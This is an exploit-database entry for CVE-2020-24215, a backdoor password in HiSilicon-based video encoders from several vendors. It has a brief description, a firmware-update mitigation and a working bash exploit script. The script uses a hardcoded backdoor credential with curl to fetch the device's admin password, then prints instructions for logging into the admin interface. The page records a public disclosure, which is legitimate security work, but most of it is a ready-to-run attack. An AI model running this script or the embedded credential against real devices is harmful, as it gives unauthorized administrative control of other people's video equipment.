HiSilicon video encoders - full admin access via backdoor password

vendor:

HiSilicon video encoders

by:

Alexei Kojenov

9.8

CVSS

CRITICAL

Backdoor Password

287

CWE

Product Name: HiSilicon video encoders

Affected Version From: Vendor-specific

Affected Version To: Vendor-specific

Patch Exists: YES

Related CWE: CVE-2020-24215

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2020

HiSilicon video encoders – full admin access via backdoor password

A vulnerability in HiSilicon video encoders from URayTech, J-Tech Digital, and ProVideoInstruments allows an attacker to gain full administrative access to the device by using a backdoor password. The backdoor password can be retrieved by sending a request to the device's web server. Once the password is retrieved, the attacker can log into the admin interface with the user 'admin' and the retrieved password.

Mitigation:

Users should update their devices to the latest version of the firmware to ensure that the backdoor password is removed.

Source

Exploit-DB raw data:

#!/usr/bin/env bash

# Exploit Title: HiSilicon video encoders - full admin access via backdoor password
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24215
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979


if [ "$#" -ne 1 ]
then
  echo "Usage: $0 <server>[:<port>]"
  exit 1
fi

printf "retrieving the password... "
password=$(curl -s --user admin:neworange88888888 http://$1/get_sys | \
           grep -oP '(?<=<html_password>).*?(?=</html_password>)')
ret=$?
           
if [ "$ret" -eq 0 ]
then
  echo "the password is '$password'"
  echo "navigate to http://$1 and log into the admin interface with user 'admin' and password '$password'"
else
  echo "ERROR: curl returned $ret"
fi